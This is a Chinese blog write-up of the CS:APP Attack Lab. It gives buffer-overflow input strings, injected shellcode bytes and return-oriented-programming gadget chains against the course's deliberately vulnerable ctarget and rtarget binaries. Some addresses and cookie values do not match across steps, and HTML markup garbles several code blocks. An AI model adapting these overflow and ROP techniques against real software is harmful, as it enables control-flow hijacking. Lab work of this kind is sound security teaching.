213 lab 3 attacklab

最新推荐文章于 2024-02-02 09:41:27 发布
最新推荐文章于 2024-02-02 09:41:27 发布
阅读量7.4k 收藏 27
点赞数 6
分类专栏: 213Lab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pessis1/article/details/52957696
版权

第三个实验主要是考察code injection 和ROP攻击 的内容

参考了这两篇文章  CSAPP 3e Attack lab   【读厚 CSAPP】III Attack Lab


http://csapp.cs.cmu.edu/3e/attacklab.pdf 这个是课程的任务书  感觉还是要仔细看啊 哭

下载了target1包之后里面的文件如下

  • cookie.txt:这个里面有一个cookie
  • rtarget:执行return-oriented-programming攻击的程序
  • ctarget:执行code-injection攻击的程序
  • farm.c:从这个里面产生gadget代码片
  • hex2raw:生成攻击字符串
  • 先来看一下堆栈的基本结构 

上面是栈底 下面是栈顶 自下而上地址依次增加 

进栈指令push先使堆栈指令sp减2,然后把一个字操作数存入堆栈顶部。堆栈操作的对象只能是字操作数,进栈时底字节存放于低地址,高字节存放于高地址,sp相应向低地址移动两个字节单元。

出栈指令pop把栈顶的一个字传送至指定的目的操作数,然后堆栈指针sp加2。目的操作数应为字操作数,字从栈顶弹出时,低地址字节送低字节,高地址字节送高字节。

下面开始


不知道为啥我直接运行./ctarget和./rtarget就总是illegal host = =蓝瘦香菇 

但是后来进行其他的操作又没有问题= =不懂


首先反编译ctarget   objdump -d ctarget > ctarget.txt  

void test() {//主函数test 通过getbuf之后运行变化 
    int val;
    val = getbuf();
    printf("NO explit. Getbuf returned 0x%x\n", val);
}


在任务书里面说了 ctarget 会调用一个getbuf的函数

1 unsigned getbuf()
2 {
3 char buf[BUFFER_SIZE];
4 Gets(buf);
5 return 1;
6 }

也就是要我们输入buffer里面的东西来达到题目的要求。

getbuf的汇编部分

00000000004017a8 <getbuf>:
  4017a8:	48 83 ec 28          	sub    $0x28,%rsp//这里可以看到buffer的大小为0x28
  4017ac:	48 89 e7             	mov    %rsp,%rdi
  4017af:	e8 8c 02 00 00       	callq  401a40 <Gets>
  4017b4:	b8 01 00 00 00       	mov    $0x1,%eax
  4017b9:	48 83 c4 28          	add    $0x28,%rsp
  4017bd:	c3                   	retq   
  4017be:	90                   	nop
  4017bf:	90                   	nop

第一题 touch1 

00000000004017c0 <touch1>://从这里得到touch1的地址是0x4017c0
  4017c0:	48 83 ec 08          	sub    $0x8,%rsp
  4017c4:	c7 05 0e 2d 20 00 01 	movl   $0x1,0x202d0e(%rip)        # 6044dc <vlevel>
  4017cb:	00 00 00 
  4017ce:	bf c5 30 40 00       	mov    $0x4030c5,%edi
  4017d3:	e8 e8 f4 ff ff       	callq  400cc0 <puts@plt>
  4017d8:	bf 01 00 00 00       	mov    $0x1,%edi
  4017dd:	e8 ab 04 00 00       	callq  401c8d <validate>
  4017e2:	bf 00 00 00 00       	mov    $0x0,%edi
  4017e7:	e8 54 f6 ff ff       	callq  400e40 <exit@plt>

所以在输入buffer之后溢出 程序跳转到touch1执行即可

即输入buffer大小的字符占满缓冲区 然后溢出的部分是touch1的地址 覆盖原有的返回地址即可

在ctarget1.txt文件中写入:

30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30
c0 17 40 00 00 00 00 00
注意一下 这里是little-endian
cat ctarget1.txt | ./hex2raw | ./ctarget -q

查看结果



touch2

void touch2(unsigned val){
    vlevel = 2;
    if (val == cookie){
        printf("Touch2!: You called touch2(0x%.8x)\n", val);
        validate(2);
    } else {
        printf("Misfire: You called touch2(0x%.8x)\n", val);
        fail(2);
    }
    exit(0);
}

可以看出要将cookie传入val中 

00000000004017ec <touch2>:
  4017ec:	48 83 ec 08          	sub    $0x8,%rsp
  4017f0:	89 fa                	mov    %edi,%edx
  4017f2:	c7 05 e0 2c 20 00 02 	movl   $0x2,0x202ce0(%rip)        # 6044dc <vlevel>
  4017f9:	00 00 00 
  4017fc:	3b 3d e2 2c 20 00    	cmp    0x202ce2(%rip),%edi        # 6044e4 <cookie>
  401802:	75 20                	jne    401824 <touch2+0x38>
  401804:	be e8 30 40 00       	mov    $0x4030e8,%esi
  401809:	bf 01 00 00 00       	mov    $0x1,%edi
  40180e:	b8 00 00 00 00       	mov    $0x0,%eax
  401813:	e8 d8 f5 ff ff       	callq  400df0 <__printf_chk@plt>
  401818:	bf 02 00 00 00       	mov    $0x2,%edi
  40181d:	e8 6b 04 00 00       	callq  401c8d <validate>
  401822:	eb 1e                	jmp    401842 <touch2+0x56>
  401824:	be 10 31 40 00       	mov    $0x403110,%esi
  401829:	bf 01 00 00 00       	mov    $0x1,%edi
  40182e:	b8 00 00 00 00       	mov    $0x0,%eax
  401833:	e8 b8 f5 ff ff       	callq  400df0 <__printf_chk@plt>
  401838:	bf 02 00 00 00       	mov    $0x2,%edi
  40183d:	e8 0d 05 00 00       	callq  401d4f <fail>
  401842:	bf 00 00 00 00       	mov    $0x0,%edi
  401847:	e8 f4 f5 ff ff       	callq  400e40 <exit@plt>

也就是要把%rdi的值改为cookie 这就需要先在缓冲区注入一段可执行代码  

 movq $0x59b997fa,%rdi//将cookie的值放进rdi
  pushq $0x004017ec      //将touch2的地址压栈   
  retq

将上面的代码保存为p2.s 

gcc -c p2.s
objdump -d p2.o  > p2.d

编译及反编译后得到机器码 

p2.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <.text>:
   0:   48 c7 c7 fa 97 b9 59    mov    $0x59b997fa,%rdi
   7:   68 ec 17 40 00          pushq  $0x4017ec
   c:   c3                      retq

最后加上rsp的地址 作为返回地址

使用gdb获取%rsp地址。在getbuf中的Gets那里打一个断点就可以看到0x5561dc78

所以可以得到ctarget2.txt的内容

48 c7 c7 fa 97 b9 59 68 ec 17
40 00 c3 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30
78 dc 61 55 00 00 00 00

最后查看结果即可 cat ctarget21.txt | ./hex2raw | ./ctarget -q


touch3

 void touch3(char *sval)
 {
     if (hexmatch(cookie, sval)) {
         printf("Touch3!: You called touch3(\"%s\")\n", sval);
         validate(3);
     } else {
         printf("Misfire: You called touch3(\"%s\")\n", sval);
         fail(3);
     }
     exit(0);
 }
可以看到 touch3是一个比较cookie和sval的函数 调用了hexmatch函数

这里有一个问题要注意 调用hexmatch函数的时候 如果cookie存在buffer里面可能会被覆盖

所以cookie要放在父堆栈上面

touch3的地址为0x4018fa,    %rsp地址0x5561dc78,

返回地址应为%rsp+0x28(40)(也就是跨过buffer缓冲区之后),然后字符串地址应为%rsp+0x30(48).在返回地址之上

于是注入的代码应该是

movq $0x5561dc98,%rdi   <span style="font-family: 'microsoft yahei';">                                                                                     </span>
pushq $0x004018fa
retq

编译反编译过程如上

得到结果

p3.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <.text>:
   0:	48 c7 c7 98 dc 61 55 	mov    $0x5561dc98,%rdi
   7:	68 fa 18 40 00       	pushq  $0x4018fa
   c:	c3

所以最后ctarget3.txt是 

48 c7 c7 a8 dc 61 55 68 fa 18                                                                                           
40 00 c3 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30
78 dc 61 55 00 00 00 00 //rsp返回地址 
35 39 62 39 39 37 66 61 00//这里要注意 将cookie转换成字符串 并且以00结尾

touch4

从这里开始就是ROP攻击的部分了

在 rtarget 中

  • 每次栈的位置是随机的,于是我们没有办法确定需要跳转的地址
  • 即使我们能够找到规律注入代码,但是栈是不可执行的,一旦执行,则会遇到段错误

那么现在怎么办呢?可以利用已有的可执行的代码,来完成我们的操作,称为 retrun-oriented programming(ROP),策略就是找到现存代码中的若干条指令,这些指令后面跟着指令 ret,如下图所示

每次 return 相当于从一个 gadget 跳转到另一个 gadget 中,然后通过这样不断跳转来完成我们想要的操作。举个具体的例子,假设程序中有一个像下面这样的函数:

     
     

      
      void setval_210(unsigned *p){
     
     

     
     

      
          *p = 
      
      3347663060U;
     
     

     
     

      
      }

这么看起来没啥用,但是看看对应的汇编代码,可能就是另一个感觉:

这里 48 89 c7 就编码了 movq %rax, %rdi 指令(参加后面的表格),后面跟着一个 c3(也就是返回),于是这段代码就包含一个 gadget,起始地址是 0x400f18,我们就可以利用这个来做一些事情了


首先和前面是一样的 rtarget 反编译:objdump -d rtarget > rtarget.txt 

这里和touch2的目的是一样的 要把cookie放进rdi里面 然后pushtouch2的地址再return


最直接地方法是把cookie存到%rsp里面,然后直接pop

但是没有找到popq %$rdi。但是找到了代表popq %rax的字节码58:

<span style="color:#333333;">00000000004019a7 <addval_219>:
  4019a7:   8d 87 51 73 </span><span style="color:#ff0000;">58 90</span><span style="color:#333333;">       lea    -0x6fa78caf(%rdi),%eax
  4019ad:  </span><span style="color:#ff0000;"> c3 </span><span style="color:#333333;">                     retq  </span>

红字的部分地址:0x4019ab gadget1

接下来是movq%rax%edi

movq %rax %edi字节码为48 89 c7 c3 

<span style="color:#333333;">00000000004019c3 <setval_426>:
  4019c3:   c7 07 </span><span style="color:#ff0000;">48 89 c7 90</span><span style="color:#333333;">       movl   $0x90c78948,(%rdi)
  4019c9:   </span><span style="color:#ff0000;">c3</span><span style="color:#333333;">                      retq</span>

红字部分地址 0x4019c5 gadget2

所以rtarget4.txt应该是

cc cc cc cc cc cc cc cc cc cc                                                                                           
cc cc cc cc cc cc cc cc cc cc
cc cc cc cc cc cc cc cc cc cc
cc cc cc cc cc cc cc cc cc cc//前面40位填充buffer 因为采取了防御机制之后 buffer里面的区域都不能执行了
ab 19 40 00 00 00 00 00//gadget1
fa 97 b9 59 00 00 00 00//cookie  
c5 19 40 00 00 00 00 00//gadget2
ec 17 40 00 00 00 00 00//touch2 返回地址

touch5

从指导书内可得

48 89 e0 movq %rsp, %rax

<span style="color:#3f3f3f;">0000000000401aab <setval_350>:
  401aab:   c7 07 </span><span style="color:#ff0000;">48 89 e0 90</span><span style="color:#3f3f3f;">       movl   $0x90e08948,(%rdi)  //90不影响
  401ab1:  </span><span style="color:#ff0000;"> c3 </span><span style="color:#3f3f3f;">                     retq</span>

所以gadget1 0x401aad

接下来我们需要一个可以递增%rax的代码片段来指向我们的cookie地址。 (这一步说实话我不太懂)
找到代表add $0x37, %al04 37:(这个04 37我查过 不懂为啥就是add)

然后我就自己写了句add 编译反编译 = = 结果真的是04 37 .。。。。。

<code class="hljs perl has-numbering" style="display: block; padding: 0px; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background-image: initial; background-attachment: initial; background-color: transparent; background-size: initial; background-origin: initial; background-clip: initial; background-position: initial; background-repeat: initial;"><span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">0000000000401</span><span style="color:rgba(0, 0, 0, 0);">9d6 <add_xy>:
  </span><span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">4019</span><span style="color:rgba(0, 0, 0, 0);">d6:   </span><span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">48</span><span style="color:rgba(0, 0, 0, 0);"> </span><span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">8</span><span style="color:rgba(0, 0, 0, 0);">d </span><span style="color:#ff0000;"><span class="hljs-number" style="box-sizing: border-box;">04</span> <span class="hljs-number" style="box-sizing: border-box;">37</span></span><span style="color:rgba(0, 0, 0, 0);">             lea    (</span><span class="hljs-variable" style="color: rgb(102, 0, 102); box-sizing: border-box;">%rdi</span><span style="color:rgba(0, 0, 0, 0);">,</span><span class="hljs-variable" style="color: rgb(102, 0, 102); box-sizing: border-box;">%rsi</span><span style="color:rgba(0, 0, 0, 0);">,</span><span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">1</span><span style="color:rgba(0, 0, 0, 0);">),</span><span class="hljs-variable" style="color: rgb(102, 0, 102); box-sizing: border-box;">%rax</span><span style="color:rgba(0, 0, 0, 0);">
  </span><span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">4019</span><span style="color:rgba(0, 0, 0, 0);">da:   c3                      retq</span></code><ul class="pre-numbering" style="color: rgb(51, 51, 51); box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li></ul><ul class="pre-numbering" style="color: rgb(51, 51, 51); box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li></ul>

第二个gadget2地址为0x4019d8。 

接下来需要%rax内容移动到%rdi中,找到代表mov %rax, %rdi48 89 c7。 
片段如下:

<code class="hljs perl has-numbering" style="display: block; padding: 0px; color: inherit; box-sizing: border-box; font-family: 'Source Code Pro', monospace;font-size:undefined; white-space: pre; border-radius: 0px; word-wrap: normal; background: transparent;"><span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">0000000000401</span>9a<span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">0</span> <addval_273>:
  <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">4019</span>a<span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">0</span>:   <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">8</span>d <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">87</span> <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">48</span> <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">89</span> c7 c3       lea    -<span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">0x3c3876b8</span>(<span class="hljs-variable" style="color: rgb(102, 0, 102); box-sizing: border-box;">%rdi</span>),<span class="hljs-variable" style="color: rgb(102, 0, 102); box-sizing: border-box;">%eax</span>
  <span class="hljs-number" style="color: rgb(0, 102, 102); box-sizing: border-box;">4019</span>a6:   c3                      retq</code><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li></ul><ul class="pre-numbering" style="box-sizing: border-box; position: absolute; width: 50px; top: 0px; left: 0px; margin: 0px; padding: 6px 0px 40px; border-right-width: 1px; border-right-style: solid; border-right-color: rgb(221, 221, 221); list-style: none; text-align: right; background-color: rgb(238, 238, 238);"><li style="box-sizing: border-box; padding: 0px 5px;">1</li><li style="box-sizing: border-box; padding: 0px 5px;">2</li><li style="box-sizing: border-box; padding: 0px 5px;">3</li></ul>

第三个gadget3地址为0x4019a2

现在总结一下,攻击的文件应该有如下部分,

缓冲区1(这里代码无法执行),

gadget1,gadget2,gadget3,(完成将字符串放进rdi的过程)

touch3的地址(作为返回地址)

填充区,cookie。填充区的大小为应该是在gadget2中偏移的0x37减去前面其余指令占的地址

也就是  55(0x37)-3*8=31字节。

cc cc cc cc cc cc cc cc cc cc                                                                                           
cc cc cc cc cc cc cc cc cc cc
cc cc cc cc cc cc cc cc cc cc
cc cc cc cc cc cc cc cc cc cc//buffer空出来
ad 1a 40 00 00 00 00 00//gadget1  把rsp的值存到rax里
d8 19 40 00 00 00 00 00  //gadget2
a2 19 40 00 00 00 00 00//gadget3
fa 18 40 00 00 00 00 00//touch3返回地址
dd dd dd dd dd dd dd dd dd dd
dd dd dd dd dd dd dd dd dd dd
dd dd dd dd dd dd dd dd dd dd
dd
35 39 62 39 39 37 66 61 00//cookie

这里还有另外一种写法 我也摘录一下

栈顶
mov  %rsp, %rax 48 89 e0 c3    0x401b11
mov  %rax, %rdi 48 89 c7 c3    0x401a2b
pop  %rax       58 c3          0x401a24
constant 0x48  //这个地方相当于在栈顶压了一个常数 也就是上一步操作里面要放到rax里面的偏移量
movl %eax, %ecx 89 c1 20 c9 c3 0x401a98 (20 c9 没有影响)
movl %ecx, %edx 89 ca 28 c0 c3 0x401ac8 (38 c0 没有影响)
movl %edx, %esi 89 d6 38 c0 c3 0x401a68 (38 c0 没有影响)
lea  (%rdi, %rsi, 1), %rax     0x401a48
mov  %rax, %rdi 48 89 c7 c3    0x401a2b
touch3 的地址
cookie 的字符串
栈底

00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
11 1b 40 00 00 00 00 00
2b 1a 40 00 00 00 00 00
24 1a 40 00 00 00 00 00
48 00 00 00 00 00 00 00
98 1a 40 00 00 00 00 00
c8 1a 40 00 00 00 00 00
68 1a 40 00 00 00 00 00
48 1a 40 00 00 00 00 00
2b 1a 40 00 00 00 00 00
6e 19 40 00 00 00 00 00
34 35 33 37 34 66 65 65
00 00 00 00 00 00 00 00

我之前一直都没有想明白那个constant的逻辑 是因为没弄清楚pop 和push

的操作

这里补习一下   链接

PUSH 等价于:

subl $4, %esp

movl %ebp (%esp)

POP 等价于:

movl (%esp), %ead

addl $4, %esp


CALL,RET和LEAVE

CALL指令的步骤:首先是将返回地址(也就是call指令要执行时EIP的值)压入栈顶,然后是将程序跳转到当前调用的方法的起始地址。执行push和jump指令。

RET指令则是将栈顶的返回地址弹出到EIP,然后按照EIP此时指示的指令地址继续执行程序。

LEAVE指令是将栈指针指向帧指针,然后POP备份的原帧指针到%EBP。


Leave等价于:

movl %ebp %esp

popl %ebp




这个lab就先这样~~撒花

pessis1
关注
专栏目录
CMU_CSAPP_LAB3_ATTACKLAB
AI_lalaland的博客
03-28 1094
本实验要仔细阅读对应的 write up ,上面给了大量的提示信息,主要是介绍两种攻击方式,分两部分,第一部分的方式对于现代计算机已经基本无效了,第二部分的方式过程比较繁杂,不过原理还是很容易理解的。实验的主要目的还是熟悉计算机的程序控制方式、函数栈帧的结构,以及熟练使用 dbg 和 objdump 工具进行调试。 本文讲解较少,可参照其他博客,有一些写的很好,附图讲解,思路清晰。 本文对实验...
CSAPP-Attack-Lab
H-ZeX Coding Life
09-16 529
CSAPP Attack Lab 本文所有答案都是传给hex2raw的文本,hex2raw会在转换好的字符串后添加换行符,所以答案里没有换行符 第一题答案aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa /*
计算机系统基础实验 AttackLab
凌阳的博客
06-18 2776
本文是作者的作业备份,仅作参考,不可照搬抄袭!本实验分为五个阶段,ctarget的三个使用的是CI(code-injection),rtarget的两个阶段使用的是ROP(return-oriented-programming),如表1所示ctarget和rtarget都是用getbuf函数从标准输入读入字符串,getbuf函数定义如下:函数Gets类似于标准库函数gets,从标准输入读入一个字符串(以’\n’或者end-of-file结束),将字符串(带null结束符)存储在指定的目的地址。从这段代码可以
CSAPP 缓冲区溢出实验
poptar的博客
06-06 1992
实验5 缓冲区溢出实验 一、实验目的 1、深入了解缓冲区溢出的隐患,了解如何利用缓冲区溢出这个漏洞对现有程序进行控制流劫持、执行非法程序代码,从而造成对程序进行攻击以及破坏的过程; 2、增强对程序机器级表示、汇编语言、调试器和逆向工程等理解。 二、实验内容 对目标程序实施缓冲区溢出攻击,通过造成缓冲区溢出来破坏目标程序的栈帧结构,继而...
Attack Lab
jokerMingge的博客
10-23 682
从下载完所需实验包后,内有官方文档以及.tar压缩包,使用解压后,得到如下文件kinclude:attacksattacks我们还是将答案保存在answer.txt,这里运行要用-q,(参考官方文档)毕竟不是 CMU 的学生,-q的作用:。这次的 lab 要仔细看官方的文档,里面是题目的要求,也包含解题指导,对解决问题很有帮助。这次 lab 就是输入攻击字符串,实现调用函数等目的,包含了对栈破坏,注入代码,ROP 攻击等方法,说明了栈溢出的危害。这里要使用
CSAPP Lab3 attacklab实验源材料
11-07
CSAPP Lab3 attacklab实验源材料 深入理解计算机系统实验三缓冲区溢出攻击实验源材料
_Attacklab实验报告.pdf
12-20
本实验通过完成在两个不同安全漏洞的程序上实现五 种攻击,目的就在于:当程序没有对缓冲区溢出做足够防范时,立交 攻击者可能会如何利用这些安全漏洞 ;通过实验,能更好的理解写 出安全的程序的重要性,也能...
【深入理解计算机系统csapp labattacklab
hazel1313的博客
11-19 1214
Attack lab Attack lab的handout写的非常详细,容易上手。一共分为两部分:第一部分是code injection attack,有3个phase;第二部分是return-oriented programming,需要在已有的程序里找需要执行的指令来完成整个程序,有2个phase。 Phase 1: 在这部分需要做的工作很简单,利用缓存区溢出,把位于getbuf栈帧底部的返回地址改为函数touch1的地址即可。 在反汇编的代码找到getbuf函数: 00000000004017a8
CSAPP-Lab03 Attack Lab 详细解析
热门推荐
qq_25591221的博客
03-05 1万+
目录实验概览Part 1: Code Injection AttacksPhase 1分析反汇编`test`反汇编`getbuf`SolutionPhase 2分析注入代码栈帧讲解SolutionPhase 3分析注入代码栈帧讲解SolutionPart 2: Return-Oriented ProgrammingPhase 4分析栈帧讲解SolutionPhase 5分析栈帧讲解Solution总结 纸上得来终觉浅,绝知此事要躬行 实验概览 Attack!,成为一名黑客不正是我小时候的梦想吗?这个实验
CSAPP Lab 3 Attack Lab phase1~3
辣鸡的博客
08-04 817
Lab 3 Attack lab phase 1 第一个很简单,只需要用x命令查看栈内容,定位到ret的返回位置,再用自己输入的缓冲区溢出数据覆盖就行了。计算好需要输入的字节长度,将touch1函数的首地址恰好覆盖原先的栈顶元素,这样ret就会返回到touch1函数,而不是返回到正常的test函数。 需要注意的是,由于转移目标地址输入到栈是ascii码形式保存的,所以如果地址是一些难以输入的ascii码怎么办?官方给了一个转换小程序hex2raw,能够将两位16进制表示的ascii码转换成字符输入,这样就
AttackLab实验-计算机系统基础-gddrxy
03-30
实验原理与内容 “AttackLab”是一个Linux下的可执行C程序,包含了5个阶段(phase1~phase5)的不同内容。程序运行过程,要求学生能够根据缓冲区的工作方式和程序的反汇编代码来确定攻击字符串长度和字符串的关键内容。每次成功实现缓冲区溢出攻击时都会有提示相应内容,如果攻击失败则单纯的提示segmentation fault相关信息。 要求攻击字符串的执行不许绕开代码的validate函数,缓冲区溢出之后对应ret的返回地址可以是以下类型: 1.函数touch1、touch2、touch3的首地址; 2.自行注入的攻击的首地址; 3.在后两个阶段(ROP攻击),与farm.c的对应的可利用的gadget的起始地址,farm.c对应的机器码已经包含在可执行文件。可以使用的gadget首地址需处于start_farm和end_farm之间的部分。 注意:前三个阶段使用ctarget作为攻击目标文件,后两个阶段使用rtarget作为攻击目标文件。 每个阶段考察一个缓冲区溢出方式,难度逐级递增:  阶段1:使用非ROP方式对ctarget进行攻击,调用touc
深入理解计算机系统(CSAPP) 实验详解:AttackLab
专业记录代码
11-23 4120
ROP妙处 先复习一下ret的动作 ret时会将当前%rsp指向的当作地址弹出,使得%rip程序计数器指到该地址的指令处,这个是通用的说法 换一种说法就是,它会直接返回到地址处。 需要注意的地方 指令是指令,栈是栈不要搞混,不管我们指令如何跳,只要不对%rsp进行操作,我们栈指针就是不会改变,ret会间接改变栈指针,因为它有两个动作(先弹出地址给%rip,然后在给%rsp加8)。 明白了上面说的,我们就可以开始讲ROP了 touch2 ---->4 movq %rax
CSAPP: Attacklab
Rachel_IS的博客
11-21 2329
命运多舛的attacklab 从上周卡到今天,愣是卡死在phase2 一度以为这次要gg了… 不过今天心理学课灵感大开!!瞬间写完!!开心???????????????? 来总结一下曲折的经历叭~ 这个lab真的能让人学会很多gdb的操作 先objdump -d 出需要的反汇编代码 先简要描述一下这个lab在干什么: 有一个函数getbuf通过调用Gets 获得你输入的字符串,你可以利用栈溢出修改返回地址和进行一系列操...
CSAPP Lab3:Attack Lab
倪多多的博客
05-16 9328
该实验是《深入理解计算机系统》(英文缩写CSAPP)课程附带实验——Lab3:Attack Lab,和Lab 2:Bomb Lab都对应书第三章内容(程序的机器级表示),该实验分为代码注入或面向返回的编程两部分,进行缓冲区溢出攻击。
CSAPP-Attack lab
mazamu的博客
10-23 194
此实验有五个任务 第一个任务是让你跳转到touch1函数 void test(){ int val; val = getbuf(); printf("No exploit. Getbuf returned 0x%x\n", val); } unsigned getbuf() { char buf[BUFFER_SIZE]; Gets(buf); return 1; } void touch1() { vlevel = 1; printf("Touch1!: You called tou
CSAPP AttackLab
qq_45775304的博客
09-01 496
欢迎前往我的github的CSAPP仓库,含各章家庭作业解答,各实验原始数据及题解和CSAPP电子书等,如果对您的学习有所帮助,能点个star就更好不过了 也欢迎访问我的个人博客,不定期分享一些学习心得 Level 1 Phase 1是一个简单直白的攻击,作为后续攻击的热身,只需照着说明手册上的提示一步步跟着做,即可将其破解 首先反汇编touch1()函数,获其地址为0x4017c0 (gdb) disassemble touch1 Dump of assembler code for func
3-Attack Lab
qq_38966867的博客
07-22 266
3-Attack Lab 1. level 1 利用栈溢出覆盖getbuf函数的返回地址 答案 前五行是正常写入buf的数据,第六行是touch1的地址0x4017c0,用于覆盖getbuf()函数的正常返回地址。注意写入的数据不能是0x0a,这个数字表述“\n”,Get()函数遇到0xa会终止。 2. level 2 注入可执行代码 那么如何让程序去执行我们的代码呢?既然我们可以向栈写入任意内容并且可以设置返回时跳转到的地址,那么我们就可以通过在栈写入指令,再令从getbuf函数返回的地址为我们栈
CSAPP--ATTACKLAB实验
最新发布
Innocence_0的博客
02-02 1467
一、实验步骤二、目标程序三、实验内容第一部分:代码注入攻击3.1. 第一关3.2. 第二关3.3. 第三关四. 实验内容第二部分:面向返回的编程4.1. 第四关4.2. 第五关附录A HEX2RAW的使用附录B 生成字节代码1.1 第一步:获取文件,输入你的学号和email地址,得到targetXXXX.tar文件。
Loudspeaker LAB 3 文版快速入门:测量与配置指南
"Loudspeaker LAB 3 是一个专门针对音箱设计和测量的软件,提供了时域和频域测量功能,包括脉冲响应、频率响应和阻抗测量。此外,它还支持分频器设计与模拟以及箱体设计与模拟。软件对系统的要求包括最低配置的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值